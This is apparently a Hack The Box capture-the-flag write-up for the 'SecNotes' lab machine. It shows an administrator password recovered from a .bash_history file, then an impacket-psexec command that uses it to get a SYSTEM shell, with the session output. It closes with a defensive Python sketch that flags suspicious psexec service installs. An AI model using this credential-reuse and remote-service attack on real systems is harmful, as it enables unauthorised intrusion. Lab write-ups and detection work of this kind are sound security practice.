WSL Assessment


Earlier, I found out that the target system is a Windows host with WSL installed. The filesystem also appears to be wrapped around an Ubuntu installation.

The administrator user left a .bash_history file in the /root directory with a CLEARTEXT credential in it.

The credential is administrator:u6!4ZwgwOM#^OBf#Nwnh

Privilege Escalation


┌──(kali㉿kali)-[~/archive/htb/labs/secnotes]
└─$ impacket-psexec 'administrator:u6!4ZwgwOM#^OBf#Nwnh@secnotes.htb' -target-ip $IP
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
 
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file tQzBasvo.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service sYNp on 10.10.10.97.....
[*] Starting service sYNp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\WINDOWS\system32> whoami
nt authority\system
 
C:\WINDOWS\system32> hostname
SECNOTES
 
C:\WINDOWS\system32> ipconfig      
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : htb
   IPv6 Address. . . . . . . . . . . : dead:beef::24b
   IPv6 Address. . . . . . . . . . . : dead:beef::90a2:5085:1f27:d4a4
   Temporary IPv6 Address. . . . . . : dead:beef::150e:bb88:4712:b500
   Link-local IPv6 Address . . . . . : fe80::90a2:5085:1f27:d4a4%11
   IPv4 Address. . . . . . . . . . . : 10.10.10.97
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%11
                                       10.10.10.2
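
On the detection side, the psexec run above uploads a binary to the ADMIN$ root and installs a service for it, which the Service Control Manager records as event 7045. The following triage sketch is an added example, not part of the original write-up or of Impacket. The sample records are constructed, and the naming heuristic (8-letter binary, 4-letter service name) is an assumption based on the names in the output above.

```python
import re

# Service binary placed directly in C:\Windows (the ADMIN$ share root), no subfolder.
ADMIN_ROOT = re.compile(r'^"?(?:%systemroot%|[a-z]:\\windows)\\([^\\"]+)\.exe\b', re.I)

# Constructed 7045 ("A service was installed in the system") records. Only the
# names in the first record are taken from the psexec output above.
SAMPLE_EVENTS = [
    {"ServiceName": "sYNp", "ImagePath": r"%systemroot%\tQzBasvo.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": r"%SystemRoot%\System32\spoolsv.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe",
     "AccountName": "LocalSystem"},
    {"ServiceName": "ExampleUpdater",
     "ImagePath": r'"C:\Program Files\Example\updater.exe" --svc',
     "AccountName": "NT AUTHORITY\\LocalService"},
]


def classify(event):
    """Return (severity, reasons); severity is 'high', 'review' or None."""
    match = ADMIN_ROOT.match(event["ImagePath"])
    if not match:
        return None, []
    reasons = ["service binary sits directly in the ADMIN$ root"]
    stem, name = match.group(1), event["ServiceName"]
    # Assumption: random 8-letter binary plus unrelated 4-letter service name,
    # the pattern visible in the output above (tQzBasvo.exe / sYNp).
    random_like = bool(re.fullmatch(r"[A-Za-z]{8}", stem)
                       and re.fullmatch(r"[A-Za-z]{4}", name))
    if random_like:
        reasons.append("random-looking service and binary names")
    as_system = event["AccountName"].lower() == "localsystem"
    if as_system:
        reasons.append("runs as LocalSystem")
    return ("high" if random_like and as_system else "review"), reasons


def triage(events):
    """Return (ServiceName, severity) for every event worth an analyst's time."""
    hits = []
    for event in events:
        severity, _ = classify(event)
        if severity:
            hits.append((event["ServiceName"], severity))
    return hits


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["ServiceName"], *classify(event))
```

The "review" tier catches tools that use a fixed name in the same location, so an allowlist of sanctioned admin tooling belongs in front of it.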

System Level Compromise